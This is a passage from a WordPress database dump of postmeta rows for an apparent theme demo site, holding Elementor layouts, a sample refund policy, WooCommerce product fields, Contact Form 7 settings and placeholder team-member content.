,\"widgetType\":\"ova_elementor_project_filter_ajax\"}],\"isInner\":false}],\"isInner\":false}]'),(1197,2628,'_elementor_page_assets','a:0:{}'),(1205,3388,'_elementor_edit_mode','builder'),(1206,3388,'_elementor_template_type','wp-page'),(1207,3388,'_elementor_version','3.6.6'),(1208,3388,'_wp_page_template','default'),(1209,3388,'_elementor_data','[{\"id\":\"1e001b50\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3c98f919\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"600ea437\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p><b>This is a sample page.<\\/b><\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<h3>Overview<\\/h3>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Our refund and returns policy lasts 30 days. If 30 days have passed since your purchase, we can\\u2019t offer you a full refund or exchange.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>To be eligible for a return, your item must be unused and in the same condition that you received it. It must also be in the original packaging.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Several types of goods are exempt from being returned. Perishable goods such as food, flowers, newspapers or magazines cannot be returned. We also do not accept products that are intimate or sanitary goods, hazardous materials, or flammable liquids or gases.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additional non-returnable items:<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:list -->\\n<ul>\\n<li>Gift cards<\\/li>\\n<li>Downloadable software products<\\/li>\\n<li>Some health and personal care items<\\/li>\\n<\\/ul>\\n<!-- \\/wp:list -->\\n\\n<!-- wp:paragraph -->\\n<p>To complete your return, we require a receipt or proof of purchase.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Please do not send your purchase back to the manufacturer.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>There are certain situations where only partial refunds are granted:<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:list -->\\n<ul>\\n<li>Book with obvious signs of use<\\/li>\\n<li>CD, DVD, VHS tape, software, video game, cassette tape, or vinyl record that has been opened.<\\/li>\\n<li>Any item not in its original condition, is damaged or missing parts for reasons not due to our error.<\\/li>\\n<li>Any item that is returned more than 30 days after delivery<\\/li>\\n<\\/ul>\\n<!-- \\/wp:list -->\\n\\n<!-- wp:paragraph -->\\n<h2>Refunds<\\/h2>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Once your return is received and inspected, we will send you an email to notify you that we have received your returned item. We will also notify you of the approval or rejection of your refund.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>If you are approved, then your refund will be processed, and a credit will automatically be applied to your credit card or original method of payment, within a certain amount of days.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<b>Late or missing refunds<\\/b>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>If you haven\\u2019t received a refund yet, first check your bank account again.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Then contact your credit card company, it may take some time before your refund is officially posted.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Next contact your bank. There is often some processing time before a refund is posted.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>If you\\u2019ve done all of this and you still have not received your refund yet, please contact us at {email address}.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<b>Sale items<\\/b>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Only regular priced items may be refunded. Sale items cannot be refunded.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<h2>Exchanges<\\/h2>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>We only replace items if they are defective or damaged. If you need to exchange it for the same item, send us an email at {email address} and send your item to: {physical address}.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<h2>Gifts<\\/h2>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>If the item was marked as a gift when purchased and shipped directly to you, you\\u2019ll receive a gift credit for the value of your return. Once the returned item is received, a gift certificate will be mailed to you.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>If the item wasn\\u2019t marked as a gift when purchased, or the gift giver had the order shipped to themselves to give to you later, we will send a refund to the gift giver and they will find out about your return.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<h2>Shipping returns<\\/h2>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>To return your product, you should mail your product to: {physical address}.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>You will be responsible for paying for your own shipping costs for returning your item. Shipping costs are non-refundable. If you receive a refund, the cost of return shipping will be deducted from your refund.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Depending on where you live, the time it may take for your exchanged product to reach you may vary.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>If you are returning more expensive items, you may consider using a trackable shipping service or purchasing shipping insurance. We don\\u2019t guarantee that we will receive your returned item.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<h2>Need help?<\\/h2>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Contact us at {email} for questions related to refunds and returns.<\\/p>\\n<!-- \\/wp:paragraph -->\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1210,3388,'_elementor_page_assets','a:0:{}'),(1211,3425,'_regular_price','33'),(1212,3425,'total_sales','2'),(1213,3425,'_tax_status','taxable'),(1214,3425,'_tax_class',''),(1215,3425,'_manage_stock','no'),(1216,3425,'_backorders','no'),(1217,3425,'_sold_individually','no'),(1218,3425,'_virtual','no'),(1219,3425,'_downloadable','no'),(1220,3425,'_download_limit','-1'),(1221,3425,'_download_expiry','-1'),(1222,3425,'_stock',''),(1223,3425,'_stock_status','instock'),(1224,3425,'_wc_average_rating','5.00'),(1225,3425,'_wc_review_count','1'),(1226,3425,'_product_version','7.1.0'),(1227,3425,'_price','33'),(1228,3425,'_wc_rating_count','a:1:{i:5;i:1;}'),(1229,3425,'_thumbnail_id','4073'),(1230,3463,'_regular_price','35'),(1231,3463,'total_sales','0'),(1232,3463,'_tax_status','taxable'),(1233,3463,'_tax_class',''),(1234,3463,'_manage_stock','no'),(1235,3463,'_backorders','no'),(1236,3463,'_sold_individually','no'),(1237,3463,'_virtual','no'),(1238,3463,'_downloadable','no'),(1239,3463,'_download_limit','-1'),(1240,3463,'_download_expiry','-1'),(1241,3463,'_stock',''),(1242,3463,'_stock_status','instock'),(1243,3463,'_wc_average_rating','0'),(1244,3463,'_wc_review_count','0'),(1245,3463,'_product_version','6.6.1'),(1246,3463,'_price','35'),(1247,3463,'_thumbnail_id','4072'),(1248,3728,'_regular_price','50'),(1249,3728,'total_sales','0'),(1250,3728,'_tax_status','taxable'),(1251,3728,'_tax_class',''),(1252,3728,'_manage_stock','no'),(1253,3728,'_backorders','no'),(1254,3728,'_sold_individually','no'),(1255,3728,'_virtual','no'),(1256,3728,'_downloadable','no'),(1257,3728,'_download_limit','-1'),(1258,3728,'_download_expiry','-1'),(1259,3728,'_stock',''),(1260,3728,'_stock_status','instock'),(1261,3728,'_wc_average_rating','0'),(1262,3728,'_wc_review_count','0'),(1263,3728,'_product_version','6.6.1'),(1264,3728,'_price','50'),(1265,3728,'_thumbnail_id','4066'),(1266,3729,'_regular_price','50'),(1267,3729,'total_sales','0'),(1268,3729,'_tax_status','taxable'),(1269,3729,'_tax_class',''),(1270,3729,'_manage_stock','no'),(1271,3729,'_backorders','no'),(1272,3729,'_sold_individually','no'),(1273,3729,'_virtual','no'),(1274,3729,'_downloadable','no'),(1275,3729,'_download_limit','-1'),(1276,3729,'_download_expiry','-1'),(1277,3729,'_stock',''),(1278,3729,'_stock_status','instock'),(1279,3729,'_wc_average_rating','0'),(1280,3729,'_wc_review_count','0'),(1281,3729,'_product_version','6.6.1'),(1282,3729,'_price','50'),(1283,3729,'_thumbnail_id','4071'),(1294,4614,'_form','<label> Your name\n    [text* your-name] </label>\n\n<label> Your email\n    [email* your-email] </label>\n\n<label> Subject\n    [text* your-subject] </label>\n\n<label> Your message (optional)\n    [textarea your-message] </label>\n\n[submit \"Submit\"]'),(1295,4614,'_mail','a:8:{s:7:\"subject\";s:30:\"[_site_title] \"[your-subject]\"\";s:6:\"sender\";s:27:\"[_site_title] <wordpress@_>\";s:4:\"body\";s:163:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\";s:9:\"recipient\";s:19:\"[_site_admin_email]\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(1296,4614,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:30:\"[_site_title] \"[your-subject]\"\";s:6:\"sender\";s:27:\"[_site_title] <wordpress@_>\";s:4:\"body\";s:105:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:29:\"Reply-To: [_site_admin_email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(1297,4614,'_messages','a:12:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:20:\"The file is too big.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";}'),(1298,4614,'_additional_settings',''),(1299,4614,'_locale','en_US'),(1300,23,'_wxr_import_term','a:3:{s:8:\"taxonomy\";s:8:\"wp_theme\";s:4:\"slug\";s:13:\"retirio-child\";s:4:\"name\";s:13:\"retirio-child\";}'),(1301,884,'_form','<div class=\"ova-wpcf7 contact-form \">\n    \n    <div class=\"ova-text\">[text* your-name class:name  placeholder \"Your name\"]</div>\n    <div class=\"ova-email\">[email* your-email class:email  placeholder \"Email address\"] </div>\n    <div class=\"ova-phone\">[tel* tel-780 class:phone placeholder \"Phone Number\"] </div>\n    <div class=\"ova-textarea\">\n       [textarea your-message class:message  placeholder \"Write a message\"]\n    </div>\n    <div class=\"ova-submit\">\n      <button type=\"submit\" class=\"wpcf7-form-control has-spinner wpcf7-submit\"><span>Send a Message</span></button>\n    </div>\n</div>'),(1302,884,'_mail','a:9:{s:6:\"active\";b:1;s:7:\"subject\";s:27:\"[_site_title] \"[your-name]\"\";s:6:\"sender\";s:36:\"[_site_title] <contact@ovatheme.com>\";s:9:\"recipient\";s:19:\"[_site_admin_email]\";s:4:\"body\";s:178:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\nTel: [tel-780]\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(1303,884,'_mail_2','a:9:{s:6:\"active\";b:1;s:7:\"subject\";s:27:\"[_site_title] \"[your-name]\"\";s:6:\"sender\";s:36:\"[_site_title] <contact@ovatheme.com>\";s:9:\"recipient\";s:12:\"[your-email]\";s:4:\"body\";s:120:\"Message Body:\nTel: [tel-780]\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\";s:18:\"additional_headers\";s:29:\"Reply-To: [_site_admin_email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(1304,884,'_messages','a:22:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:20:\"The file is too big.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";s:12:\"invalid_date\";s:29:\"The date format is incorrect.\";s:14:\"date_too_early\";s:44:\"The date is before the earliest one allowed.\";s:13:\"date_too_late\";s:41:\"The date is after the latest one allowed.\";s:14:\"invalid_number\";s:29:\"The number format is invalid.\";s:16:\"number_too_small\";s:47:\"The number is smaller than the minimum allowed.\";s:16:\"number_too_large\";s:46:\"The number is larger than the maximum allowed.\";s:23:\"quiz_answer_not_correct\";s:36:\"The answer to the quiz is incorrect.\";s:13:\"invalid_email\";s:38:\"The e-mail address entered is invalid.\";s:11:\"invalid_url\";s:19:\"The URL is invalid.\";s:11:\"invalid_tel\";s:32:\"The telephone number is invalid.\";}'),(1305,884,'_additional_settings',''),(1306,884,'_locale','en_US'),(1307,884,'_config_errors','a:2:{s:11:\"mail.sender\";a:1:{i:0;a:2:{s:4:\"code\";i:103;s:4:\"args\";a:3:{s:7:\"message\";s:0:\"\";s:6:\"params\";a:0:{}s:4:\"link\";s:70:\"https://contactform7.com/configuration-errors/email-not-in-site-domain\";}}}s:13:\"mail_2.sender\";a:1:{i:0;a:2:{s:4:\"code\";i:103;s:4:\"args\";a:3:{s:7:\"message\";s:0:\"\";s:6:\"params\";a:0:{}s:4:\"link\";s:70:\"https://contactform7.com/configuration-errors/email-not-in-site-domain\";}}}}'),(1308,930,'ova_team_met_avatar_id','926'),(1309,930,'ova_team_met_avatar','https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg'),(1310,930,'ova_team_met_job','Architecture'),(1311,930,'ova_team_met_group_icon','a:4:{i:0;a:2:{s:30:\"ova_team_met_class_icon_social\";s:14:\"fab fa-twitter\";s:24:\"ova_team_met_link_social\";s:20:\"https://twitter.com/\";}i:1;a:2:{s:30:\"ova_team_met_class_icon_social\";s:15:\"fab fa-facebook\";s:24:\"ova_team_met_link_social\";s:41:\"https://www.facebook.com/ovatheme.envato/\";}i:2;a:2:{s:30:\"ova_team_met_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:24:\"ova_team_met_link_social\";s:26:\"https://www.pinterest.com/\";}i:3;a:2:{s:30:\"ova_team_met_class_icon_social\";s:16:\"fab fa-instagram\";s:24:\"ova_team_met_link_social\";s:26:\"https://www.instagram.com/\";}}'),(1312,930,'ova_team_met_slogans','<h3>I help my clients stand out and they help me grow.</h3>\r\n<p>Lorem ipsum dolor sit amet, con adipiscing elit tiam convallis elit id impedie. Quisq commodo simply free ornare tortor.</p>\r\n\r\n<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden in the middle of text.</p>'),(1313,930,'ova_team_met_order_team','1'),(1314,930,'_elementor_edit_mode','builder'),(1315,930,'_elementor_template_type','wp-post'),(1316,930,'_elementor_version','3.6.6'),(1317,930,'_wp_page_template','default'),(1318,930,'_elementor_data','[{\"id\":\"fdf95b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c1adc30\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":40,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"88add9e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Personal experience\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ffc3307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"90f1ef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"349a0b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"f0b4c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"7ef98be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Interior\",\"percent\":{\"unit\":\"%\",\"size\":40,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"72b6bee\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-3.jpg\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"e8692ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"645829f\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_3\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"6030bc4\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"c9dec93\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"7512efb\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"}}],\"dot_control\":\"\",\"content_color\":\"#FFFFFF\",\"author_name_color\":\"#FFFFFF\",\"content_testimonial_typography_typography\":\"custom\",\"content_testimonial_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"content_testimonial_typography_font_weight\":\"500\",\"content_testimonial_typography_line_height\":{\"unit\":\"em\",\"size\":1.6,\"sizes\":[]},\"author_name_typography_typography\":\"custom\",\"author_name_typography_font_weight\":\"800\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"job_typography_font_weight\":\"700\",\"job_typography_text_transform\":\"uppercase\",\"job_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"job_color\":\"#E3B25A\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"background_item_padding_mobile\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"5c64a4f\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8a92eb0\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"78a7995\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"253227a\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9838c98\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"02e7bd7\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}}],\"author_name_typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27c1be6\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d2671f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"a61f2bd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-planning-stage.jpg\",\"id\":2348,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91355df\",\"elType\":\"widget\",\"settings\":{\"title\":\"Planning stage\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e06b4f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f2bb79e\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"49ac777\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"7a518f5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-flexible-output.jpg\",\"id\":2346,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"21dc602\",\"elType\":\"widget\",\"settings\":{\"title\":\"Flexible output\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dab0350\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"06b4b1f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Complete italian wooden works\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas 